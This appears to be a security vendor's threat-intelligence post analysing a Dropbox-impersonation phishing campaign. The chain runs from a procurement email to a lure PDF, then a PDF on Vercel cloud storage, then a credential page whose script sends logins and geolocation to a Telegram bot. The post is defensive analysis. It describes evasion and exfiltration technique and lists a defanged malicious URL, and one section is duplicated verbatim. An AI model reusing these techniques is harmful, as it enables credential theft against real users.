Fake Dropbox Phishing Campaign via PDF and Cloud Storage

Recently, the X-Labs team has detected a phishing campaign that utilizes a multi-stage approach to evade email and content scanning by exploiting trusted platforms, a harmless file format and layered redirection.  

The attack itself begins with a phishing email containing a PDF attachment. The malicious chain relies on seemingly legitimate cloud infrastructure, such as Vercel Blob storage, to host a PDF that ultimately redirects victims to a Dropbox-impersonation page designed to harvest credentials.

Attack Chain Summary: 

📧 Initial Access -> 📄 Lure PDF Attachment -> ☁️ PDF on Trusted Cloud Storage -> 🔐 Fake Dropbox Login Page -> 🎣 Credential Theft -> 📡 C2 / Exfiltration (Telegram) 

Initial Access Through Procurement-Themed Email

The victim receives a professional-sounding business email (See Figure 1 below) that appears to be part of a normal procurement/tender process. The message asks the recipient to review an attached request order and to sign in using their business email credentials. This type of wording is commonly used in tender or procurement fraud, where urgency and legitimacy are deliberately created to encourage quick action.  

Notably, the email body itself contains no malicious links. Instead, this attack relies on a PDF attachment as the primary delivery mechanism. Emails like this are particularly effective because they often pass standard email authentication checks such as SPF, DKIM and DMARC. The minimal and business-like content helps avoid keyword-based detection, making the message look and feel more like a routine operational request. The sender address is likely spoofed or associated with a compromised account. 

Fig. 1 - Phishing email delivery
 

PDF Attachment Techniques that Evade Link Detection

An analysis of the PDF’s characteristics shows that it uses /FlateDecode-compressed streams and /AcroForm objects. This is noteworthy because AcroForms are commonly abused to embed interactive or clickable elements while minimizing visible content. 

Fig. 2 - Contents of the lure PDF 
 

Trusted Cloud Storage as a Staging Layer

We also observed a clickable element by hovering over the Text “View specification online Here:”. It embeds with a Cloud-Hosted link - hxxps[://]nte2srryro7jecki[.]public[.]blob[.]vercel-storage[.]com/ProductLists[.]pdf that directs the victim to view a PDF hosted on legitimate cloud infrastructure i.e public.blob[.]vercel-storage[.]com, exploiting implicit trust in well-known platforms. Fig3 shows the PDF hosted on cloud infrastructure. 

Fig. 3 - Staging PDF 
 

Trusted Cloud Storage as a Staging Layer

We also observed a clickable element by hovering over the Text “View specification online Here:”. It embeds with a Cloud-Hosted link - hxxps[://]nte2srryro7jecki[.]public[.]blob[.]vercel-storage[.]com/ProductLists[.]pdf that directs the victim to view a PDF hosted on legitimate cloud infrastructure i.e public.blob[.]vercel-storage[.]com, exploiting implicit trust in well-known platforms. Fig3 shows the PDF hosted on cloud infrastructure. 

Fig. 4 - Social engineering attack
 

Stolen Credentials Sent to Telegram Infrastructure

The credentials entered by the victim are then captured and transmitted to the attacker, enabling account takeover and potential lateral movement.  Looking at the content of the fake page, we observe a JavaScript with following functionalities.

Form handling & Validation

It retrieves email and password input fields (#email, #password) and login form. Fig 5 shows the routine

Fig. 5 -Email & password retrieval routine 
 

It includes validation functions for email (using a basic regex) and password (checking for a minimum length of 0 characters, which effectively means it allows any password)

Data Collection

It attempts to extract an email address from the URL query parameters. Upon form submission, it gathers the entered email and password.

From there, it fetches the user's IP address and geo-location details (city, region, country, ISP) using external APIs (https://api64.ipify.org and https://ipapi.co). Figure 6 shows the routine: 

Fig. 6 - Data collection 
 

Data Transmission (Telegram Integration)

To transmit the information, It constructs a message containing the collected form data (email, password) and user/system details (IP, geo-location, date, time, device).

It then sends this data to a Telegram bot using a hardcoded bot token and chat ID. This means that any data entered the login form will be sent to a specific Telegram channel.  Figure 7 shows the routine in more detail:  

Fig. 7 - Data transmission 
 

Simulated Login Process

After sending data to Telegram, it simulates a login process using a 5-second delay. It currently has “loginSuccess” hardcoded to False, meaning it will always display an "Invalid email or password" error message after the delay, regardless of the input. See this  routine below: 

Fig. 8 - Simulated Dropbox login process 
 

Overall, the script is designed to capture user credentials (email and password) along with user system and location information to transmit it to a Telegram bot, while presenting a fake login failure message to the user.

Why This Multi-Stage PDF Chain Works

This attack began with an initial access through a routine business email. The email contained a PDF attachment used as a lure, a file type that is widely trusted and commonly exchanged in everyday business.  

Once opened, the PDF did not deliver malware. Instead, it directs the user to a second PDF hosted on a trusted cloud service. This step was critical. By using legitimate cloud infrastructure, the attackers reduce suspicion, bypassing many automated security checks that rely on reputation and known-bad indicators in the process.  

The cloud-hosted document then redirects victims to a fake Dropbox login page. Because Dropbox is a familiar and trusted brand, the request for credentials appeared reasonable to the unsuspecting users. It’s here that the campaign moves from deception to impact.

Once the victim enters login details, credentials get harvested. These stolen credentials are then exfiltrated to attacker-controlled command-and-control infrastructure, enabling further misuse such as account takeover, internal access or additional follow-on fraud.

Protection Statement

Forcepoint customers are protected against this threat at the following stages of attack:

• Lure – Email delivered with a weaponized PDF. It is added to our malicious hash database. Email is blocked.  
• Dropper – PDF dropper categorized. PDF is added to our malicious hash database.
• Redirection – URL to fake Dropbox login page categorized.
• Call Home – C2 categorized.  

IOC